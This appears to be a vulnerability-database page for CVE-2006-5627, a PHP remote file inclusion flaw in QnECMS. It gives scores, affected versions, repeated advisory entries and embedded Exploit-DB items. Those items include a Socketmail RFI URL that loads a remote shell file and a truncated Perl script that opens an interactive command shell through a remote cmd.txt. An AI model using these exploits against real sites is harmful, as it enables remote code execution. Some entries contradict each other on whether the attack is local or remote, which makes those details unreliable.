CVE-2006-5627
published 2006-10-31CVE-2006-5627: Multiple PHP remote file inclusion vulnerabilities in QnECMS 2.5.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.33%
95.1th percentile
Multiple PHP remote file inclusion vulnerabilities in QnECMS 2.5.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the adminfolderpath parameter to (1) headerscripts.php, (2) footerhome.php, and (3) footermain.php in admin/include/; (4) photogallery/headerscripts.php; and (5) footerhome.php, (6) footermain.php, (7) headermain.php, (8) sitemapfooter.php, and (9) sitemapheader.php in templates/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qnecms | qnecms | <= 2.5.6 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
QnECMS templates/headermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS templates/headermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability described as critical has been identified in QnECMS. This vulnerability affects unknown code of the file templates/headermain.php. Such manipulation of the argument adminfolderpath leads to improper privilege management.
This vulnerability is traded as CVE-2006-5627. An attack has to be approached locally. Furthermore, there is an exploit available.
VulDB
QnECMS templates/footerhome.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS templates/footerhome.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability labeled as critical has been found in QnECMS. Affected by this issue is some unknown functionality of the file templates/footerhome.php. The manipulation of the argument adminfolderpath results in improper privilege management.
This vulnerability is reported as CVE-2006-5627. The attack requires a local approach. Moreover, an exploit is present.
VulDB
QnECMS footermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS footermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability categorized as critical has been discovered in QnECMS. Affected is an unknown function of the file admin/include/footermain.php. Executing a manipulation of the argument adminfolderpath can lead to improper privilege management.
This vulnerability is registered as CVE-2006-5627. It is possible to launch the attack remotely. Furthermore, an exploit is available.
VulDB
QnECMS footerhome.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS footerhome.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability was found in QnECMS. It has been rated as critical. This impacts an unknown function of the file admin/include/footerhome.php. Performing a manipulation of the argument adminfolderpath results in improper privilege management.
This vulnerability is cataloged as CVE-2006-5627. The attack must be initiated from a local position. Furthermore, there is an exploit available.
VulDB
QnECMS 2.5.6 headerscripts.php adminfolderpath file inclusion (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS 2.5.6 headerscripts.php adminfolderpath file inclusion (EDB-2681 / XFDB-29871)
A vulnerability categorized as critical has been discovered in QnECMS 2.5.6. This issue affects some unknown processing of the file headerscripts.php. The manipulation of the argument adminfolderpath results in file inclusion.
This vulnerability was named CVE-2006-5627. The attack may be performed from remote. In addition, an exploit is available.
VulDB
QnECMS headerscripts.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS headerscripts.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability identified as critical has been detected in QnECMS. Affected by this vulnerability is an unknown functionality of the file photogallery/headerscripts.php. The manipulation of the argument adminfolderpath leads to improper privilege management.
This vulnerability is documented as CVE-2006-5627. The attack needs to be performed locally. Additionally, an exploit exists.
VulDB
QnECMS templates/footermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
vuldb·2026-04-26·CVSS 7.5
CVE-2006-5627 [HIGH] QnECMS templates/footermain.php adminfolderpath privileges management (EDB-2681 / XFDB-29871)
A vulnerability marked as critical has been reported in QnECMS. This affects an unknown part of the file templates/footermain.php. This manipulation of the argument adminfolderpath causes improper privilege management.
This vulnerability appears as CVE-2006-5627. The attack requires local access. In addition, an exploit is available.
GHSA
GHSA-gm2g-2jc7-7qvc: Multiple PHP remote file inclusion vulnerabilities in QnECMS 2
ghsa_unreviewed·2022-05-01
CVE-2006-5627 [HIGH] GHSA-gm2g-2jc7-7qvc: Multiple PHP remote file inclusion vulnerabilities in QnECMS 2
Multiple PHP remote file inclusion vulnerabilities in QnECMS 2.5.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the adminfolderpath parameter to (1) headerscripts.php, (2) footerhome.php, and (3) footermain.php in admin/include/; (4) photogallery/headerscripts.php; and (5) footerhome.php, (6) footermain.php, (7) headermain.php, (8) sitemapfooter.php, and (9) sitemapheader.php in templates/.
No detection rules found.
Exploit-DB
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
exploitdb·2007-10-22
CVE-2007-5627 Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
---
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"
DORK2: "Powered by SocketMail"
[email protected]
shadow.php0h.com
# milw0rm.com [2007-10-22]
Exploit-DB
QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion
exploitdb·2006-10-30
CVE-2006-5627 QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion
QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion
---
#!/usr/bin/perl
##
# QnECMS
#
# perl QnECMs.pl http://target.com/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
##
# #
#Greetz: My Dearest Wife - ping, echo|staff (y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative), SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16, mbahngarso, etc
#
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
##
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'admin/include/headerscripts.php
No writeups or analysis indexed.
http://advisories.echo.or.id/adv/adv53-K-159-2006.txthttp://secunia.com/advisories/22623http://www.osvdb.org/30117http://www.osvdb.org/30118http://www.osvdb.org/30119http://www.osvdb.org/30120http://www.osvdb.org/30121http://www.osvdb.org/30122http://www.osvdb.org/30123http://www.osvdb.org/30124http://www.osvdb.org/30125http://www.securityfocus.com/archive/1/450056/100/0/threadedhttp://www.securityfocus.com/archive/1/452356/100/0/threadedhttp://www.securityfocus.com/bid/20801http://www.vupen.com/english/advisories/2006/4258https://exchange.xforce.ibmcloud.com/vulnerabilities/29871https://www.exploit-db.com/exploits/2681http://advisories.echo.or.id/adv/adv53-K-159-2006.txthttp://secunia.com/advisories/22623http://www.osvdb.org/30117http://www.osvdb.org/30118http://www.osvdb.org/30119http://www.osvdb.org/30120http://www.osvdb.org/30121http://www.osvdb.org/30122http://www.osvdb.org/30123http://www.osvdb.org/30124http://www.osvdb.org/30125http://www.securityfocus.com/archive/1/450056/100/0/threadedhttp://www.securityfocus.com/archive/1/452356/100/0/threadedhttp://www.securityfocus.com/bid/20801http://www.vupen.com/english/advisories/2006/4258https://exchange.xforce.ibmcloud.com/vulnerabilities/29871https://www.exploit-db.com/exploits/2681
2006-10-31
Published